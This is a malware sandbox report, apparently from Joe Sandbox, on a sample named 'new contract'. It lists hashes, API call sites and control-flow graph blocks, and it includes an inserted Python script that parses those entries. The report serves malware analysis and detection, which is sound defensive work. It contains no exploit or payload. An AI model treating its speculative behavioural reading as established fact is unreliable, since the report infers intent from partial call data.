                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: e93b157703c2a8edba07a0835b37a589a07f98f219307276279df38eaed497fb
                                                                                                                                                                            • Instruction ID: 22a0c5602167dc04f56710278e5ac1d60890ac0f729e9f2b723f2e14867e28d5
                                                                                                                                                                            • Opcode Fuzzy Hash: e93b157703c2a8edba07a0835b37a589a07f98f219307276279df38eaed497fb
                                                                                                                                                                            • Instruction Fuzzy Hash: C6900435311400030105FD5C0F0C507004FD7D5351355C131F5015750DD731CD715331
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 57ed11ce04f73bae528b7a15e76a5fb5af136af5a6cfa2209e91dc89003f109f
                                                                                                                                                                            • Instruction ID: 077264464a19b4303da0f0ba24ea8771e0188bf338d04d41d1381306e3ec3074
                                                                                                                                                                            • Opcode Fuzzy Hash: 57ed11ce04f73bae528b7a15e76a5fb5af136af5a6cfa2209e91dc89003f109f
                                                                                                                                                                            • Instruction Fuzzy Hash: 5990022130140003D1407558581C6074009E7E1301F55D121E4414654DD9158D565322
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: d18123388768f473314c7a4bc8a621c4c3a1f57f6425e76d0d7f97cc49e09338
                                                                                                                                                                            • Instruction ID: 23c44f9f7c0ccdde50e8a47e1582190f4d1dc869a6600f3b7a53e985c6ab7b2d
                                                                                                                                                                            • Opcode Fuzzy Hash: d18123388768f473314c7a4bc8a621c4c3a1f57f6425e76d0d7f97cc49e09338
                                                                                                                                                                            • Instruction Fuzzy Hash: A290022921340002D1807558580C60B000997D1202F95D525A4015658DC9158D695321
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                                                                                                                                            • Instruction ID: 01099398d30b42247e3df16b17c272a8bb82719c0f9b863466386cdee242d7ec
                                                                                                                                                                            • Opcode Fuzzy Hash: b1275f5b4134a9eabfff8456f208cd0bd0f5a29d9aba5dd2adebfcf7deae027b
                                                                                                                                                                            • Instruction Fuzzy Hash: AB90023120140413D11175584908707000D97D0241F95C522A4424658ED6568E52A221
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 3340b977abc0a125eb1d30446df286bb8c406af4b03142260aee87f5857f63db
                                                                                                                                                                            • Instruction ID: 9092915bf9b2b0314d6c4f44d434a8849fcda06ff662cf15e2b9e3beb717f164
                                                                                                                                                                            • Opcode Fuzzy Hash: 3340b977abc0a125eb1d30446df286bb8c406af4b03142260aee87f5857f63db
                                                                                                                                                                            • Instruction Fuzzy Hash: 8E900221242441525545B5584808507400AA7E0241795C122A5414A50DC5269D56D721
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                                                                                                                                            • Instruction ID: 8973fd18af62722bdd88b5a23aa77d3e606dfabfa1f0fd2dadebea27c8fbdbdc
                                                                                                                                                                            • Opcode Fuzzy Hash: 7ca7b8c27e3b85ab1a0cfbbc4a53b0f63c82ae3d7ca6e55d84049a62e1547f0c
                                                                                                                                                                            • Instruction Fuzzy Hash: F190023120148802D1107558880874B000997D0301F59C521A8424758EC6958D917221
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: ae21458706c8cfc987989e26298a1388cce1e368ccc0b41b065301feddffc57b
                                                                                                                                                                            • Instruction ID: 0f9aa48dc1d1c748ba24fd6d056fac7becae8afbb45ecd7bf4f8f4db6008dd1b
                                                                                                                                                                            • Opcode Fuzzy Hash: ae21458706c8cfc987989e26298a1388cce1e368ccc0b41b065301feddffc57b
                                                                                                                                                                            • Instruction Fuzzy Hash: 3690023120140402D1007998580C647000997E0301F55D121A9024655FC6658D916231
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                                                                                                                                            • Instruction ID: a8a622882e7305bc52a6ecbf61ce57e479468eff335fd8617a0820ab1c71a580
                                                                                                                                                                            • Opcode Fuzzy Hash: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                                                                                                                                            • Instruction Fuzzy Hash: 2690026134140442D10075584818B070009D7E1301F55C125E5064654EC619CD526226
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                                                                                                                                            • Instruction ID: c1b14f7557f880ec428c1de71a6eff494f0090edb1a17938333871d27bef3753
                                                                                                                                                                            • Opcode Fuzzy Hash: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                                                                                                                                            • Instruction Fuzzy Hash: 71900221211C0042D20079684C18B07000997D0303F55C225A4154654DC9158D615621
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                                                                                                                                            • Instruction ID: ccae4fdb42f9bdcf6bc8ffd2f993fdb2c939bc55f91398df76c5896a7296b46f
                                                                                                                                                                            • Opcode Fuzzy Hash: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                                                                                                                                            • Instruction Fuzzy Hash: 8890022160140042414075688C489074009BBE1211755C231A4998650EC5598D655765
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
• Instruction ID: 8e3bd5dde2208af87f2cde39045525fa13dfe0f9ddd9418f29816b31d6598206
• Opcode Fuzzy Hash: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
• Instruction Fuzzy Hash: 0090023120180402D10075584C1870B000997D0302F55C121A5164655EC6258D516671
APIs
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
• Instruction ID: 577adceda164299ae625314c4a374c6e25363ad44c8e2849a63a6511d0c8ee05
• Opcode Fuzzy Hash: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
• Instruction Fuzzy Hash: 6590027120140402D14075584808747000997D0301F55C121A9064654FC6598ED56765
APIs
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
• Instruction ID: 190e5d8c0731743c04a734760077fd6fbc74101c49768f65093c7f9ad80c4862
• Opcode Fuzzy Hash: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
• Instruction Fuzzy Hash: AE90022160140502D10175584808617000E97D0241F95C132A5024655FCA258E92A231
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
• Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
• Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
• Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6

Control-flow Graph
APIs
• RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: AllocateExitHeapProcess
• String ID: &EA
• API String ID: 1054155344-1330915590
• Opcode ID: fbf9989a65e99e43cbca00d8cfc9c04f34207fc74a16e78092d61f3c6d2f3074
• Instruction ID: 07c2672e5ef9689ab5b3ef21e0c9f8aa0f2526ad952a8cdbd55fb6fbb6c95729
• Opcode Fuzzy Hash: fbf9989a65e99e43cbca00d8cfc9c04f34207fc74a16e78092d61f3c6d2f3074
• Instruction Fuzzy Hash: A9F022B9204200BFD720DF68CC80EDB3B959F44318F05815AFC485B343D234DD1686B1

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved)
• Block 10: 41a5f0-41a621, call 41af20, RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: &EA
• API String ID: 1279760036-1330915590
• Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
• Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved)
• Block 216: 408308-40835a, call 41be20, call 41c9c0, call 40ace0, call 414e40
• Block 225: 40835c-40836e, PostThreadMessageW
• Block 226: 40838e-408392
• Block 227: 408370-40838a, call 40a470
• Block 228: 40838d
• Edges: 216->225, 216->226, 225->227, 225->228, 227->228, 228->226
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: c9237fdc43732a0a8c57769e8a9f2c156fe9de07182f218656ee6ff0cd478d85
• Instruction ID: 2ef4646d849cd2d695c638bfdfcd82ceafcc94a06a713540becad9db5abc0352
• Opcode Fuzzy Hash: c9237fdc43732a0a8c57769e8a9f2c156fe9de07182f218656ee6ff0cd478d85
• Instruction Fuzzy Hash: 4B01B971A4032877E720A6958C03FFE775CAB40B54F04012DFF04BA1C1E6A8690547E9

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved)
• Block 231: 408310-40831f
• Block 232: 408328-40835a, call 41c9c0, call 40ace0, call 414e40
• Block 233: 408323, call 41be20
• Block 240: 40835c-40836e, PostThreadMessageW
• Block 241: 40838e-408392
• Block 242: 408370-40838a, call 40a470
• Block 243: 40838d
• Edges: 231->232, 231->233, 233->232, 232->240, 232->241, 240->242, 240->243, 242->243, 243->241
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
• Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
• Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
• Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the original image is not preserved)
• Block 267: 41a787-41a7be, call 41af20
• Block 270: 41a7bf-41a7c4, LookupPrivilegeValueW
• Edges: 267->270
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 39026f5965a9e8556e010cdae46e6e53f68c4aedf67d634c4040111bc5648c2e
• Instruction ID: 613681ee16ad2e00208a96de23f0b8a9ba4c4472475d2bb781bd528aee46b068
• Opcode Fuzzy Hash: 39026f5965a9e8556e010cdae46e6e53f68c4aedf67d634c4040111bc5648c2e
• Instruction Fuzzy Hash: 71E06DB16002046FCB24DF95CC85EEF3769EF84254F158569F9099B241CA34E851CBA1
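The function entries above record each imported call as one "APIs" bullet per call site and, where the control-flow graph image was rendered as text, the basic blocks and edges of the function. The script below is an added example for this page and is not Joe Sandbox code or output; it parses both forms into structured records so the call order across the dumped image and the block that reaches PostThreadMessageW can be read off. It assumes only the plain-text layout visible in these entries. The ARITY and WM_NAMES tables are Win32 documentation constants, not report data: the bullets list more values than the API takes (ExitProcess shows six), so the entries past the documented parameter count are stack slots, not arguments, and the Msg value 00000111 decodes to WM_COMMAND.

```python
"""Parse Joe Sandbox IDA-plugin function entries into structured records.

Added illustration for this report page, not Joe Sandbox code. Assumes the
plain-text layout seen in the entries: one API bullet per line shaped as
  Name.MODULE(slot,slot,...), ref: ADDRESS
and one whitespace-separated control_flow_graph line per function.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Input lines copied from the report entries above.
API_LINES = [
    "RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D",
    "ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698",
    "PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A",
    "LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0",
]
CFG_LINE = (
    "control_flow_graph 216 408308-40835a call 41be20 call 41c9c0 call 40ace0 call 414e40 "
    "225 40835c-40836e PostThreadMessageW 216->225 226 40838e-408392 216->226 "
    "227 408370-40838a call 40a470 225->227 228 40838d 225->228 227->228 228->226"
)

API_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")

# Documented parameter counts (Win32/NT API docs, not report data). The report
# prints more slots than the API takes; only the first N are real parameters.
ARITY = {"RtlAllocateHeap": 3, "ExitProcess": 1, "PostThreadMessageW": 4, "LookupPrivilegeValueW": 3}

# winuser.h message constants used to name PostThreadMessageW's Msg parameter.
WM_NAMES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0111: "WM_COMMAND"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # raw slot values; "?" means the value was not recovered
    ref: int            # address of the call site inside the dumped image


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)   # intra-image call targets
    api: Optional[str] = None                    # imported API called from the block


@dataclass
class Cfg:
    blocks: dict
    edges: list


def parse_api_line(line: str) -> ApiCall:
    m = API_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API bullet: {line!r}")
    return ApiCall(m["api"], m["mod"], m["args"].split(","), int(m["ref"], 16))


def real_params(call: ApiCall) -> list:
    """Trim the stack-slot dump to the API's documented parameters."""
    n = ARITY.get(call.api)
    return call.args[:n] if n is not None else call.args


def decode_message(call: ApiCall) -> Optional[str]:
    """Name the Msg parameter of a PostThreadMessageW call when it is known."""
    if call.api != "PostThreadMessageW" or call.args[1] == "?":
        return None
    msg = int(call.args[1], 16)
    return WM_NAMES.get(msg, f"0x{msg:04X}")


def call_sequence(lines: list) -> list:
    """API names ordered by call-site address, i.e. by position in the image."""
    return [c.api for c in sorted(map(parse_api_line, lines), key=lambda c: c.ref)]


def parse_cfg(line: str) -> Cfg:
    toks = line.split()
    if toks[0] != "control_flow_graph":
        raise ValueError("not a control_flow_graph line")
    blocks, edges, i = {}, [], 1
    while i < len(toks):
        if "->" in toks[i]:                       # edge token, e.g. "216->225"
            a, b = toks[i].split("->")
            edges.append((int(a), int(b)))
            i += 1
            continue
        bid, rng = int(toks[i]), toks[i + 1]      # block: decimal id, then hex address or range
        start, _, end = rng.partition("-")
        blk = Block(bid, int(start, 16), int(end or start, 16))
        i += 2
        while i < len(toks):                      # block body: "call <target>" pairs or an API name
            if toks[i] == "call":
                blk.calls.append(toks[i + 1])
                i += 2
            elif toks[i].isidentifier():          # hex addresses and ids start with a digit, names do not
                blk.api = toks[i]
                i += 1
            else:
                break
        blocks[bid] = blk
    return Cfg(blocks, edges)


def successors(cfg: Cfg, bid: int) -> list:
    return sorted(b for a, b in cfg.edges if a == bid)


if __name__ == "__main__":
    for c in map(parse_api_line, API_LINES):
        print(f"{c.ref:08X} {c.module}!{c.api}{tuple(real_params(c))} {decode_message(c) or ''}")
    cfg = parse_cfg(CFG_LINE)
    for b in cfg.blocks.values():
        print(f"block {b.bid}: {b.start:x}-{b.end:x} calls={b.calls} api={b.api} -> {successors(cfg, b.bid)}")
```

Run on the lines from this page, the call sequence by address is PostThreadMessageW (0040836A), RtlAllocateHeap (0041A61D), ExitProcess (0041A698), LookupPrivilegeValueW (0041A7C0), and block 216 of the graph branches to either the PostThreadMessageW block (225) or straight to the exit block (226), which is the shape one expects of a conditional "post WM_COMMAND to a thread" helper.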

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
• control_flow_graph 271 41a803-41a805 272 41a807-41a837 call 41af90 271->272 273 41a7bf-41a7c4 LookupPrivilegeValueW 271->273
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: f924cb94eadc6d257736d8bfdea27727e1d9d93b62097328727e3fbba155a19f
• Instruction ID: 2a6f473bbb32cfa337600a60209bf369941281673541ac6456650ec3ae10958d
• Opcode Fuzzy Hash: f924cb94eadc6d257736d8bfdea27727e1d9d93b62097328727e3fbba155a19f
• Instruction Fuzzy Hash: 9DE026761092800BD746FF78E8C14E6BFA0DE81238314899FE4A84B202D17BD12F8B88

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
• control_flow_graph 277 41a630-41a661 call 41af20 RtlFreeHeap
APIs
• RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
• Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

Control-flow Graph (basic blocks and edges; the executed/not-executed colouring of the rendered graph is not recoverable from the text)
• control_flow_graph 280 41a790-41a7a9 281 41a7af-41a7c4 LookupPrivilegeValueW 280->281 282 41a7aa call 41af20 280->282 282->281
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
• Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5
APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698
Memory Dump Source
• Source File: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_new contract.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
• Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1
APIs
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
• Instruction ID: ed04d65438d043016408d079d6d25e8f8396ab6dfcbe044dfe025994d13a91ed
• Opcode Fuzzy Hash: 3364a28f73ae512255cba0dc6375d1e624772231679d2937612495fb76eb69cd
• Instruction Fuzzy Hash: 16B09B719015C5C9DB51F7644E0C717790477D0701F15C175D6030751F4738C5D1E275
Strings
Memory Dump Source
• Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
Similarity
• API ID:
• String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
• API String ID: 0-2160512332
• Opcode ID: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
• Instruction ID: 2eed2a66f7b874528d3001fed460f260983ad90ae624c5de66e018a8a2708a28
• Opcode Fuzzy Hash: 6a1b77d8a0e9f5eaa33adff1ad6c1bb7629a9ba4623dd4ca4095750ed92191e9
• Instruction Fuzzy Hash: A6929971688342ABE721CE28CC90B6BBBE9BB84754F44482DFA9597351D770EC44CF92
Strings
• corrupted critical section, xrefs: 016954C2
• undeleted critical section in freed memory, xrefs: 0169542B
• Critical section address, xrefs: 01695425, 016954BC, 01695534
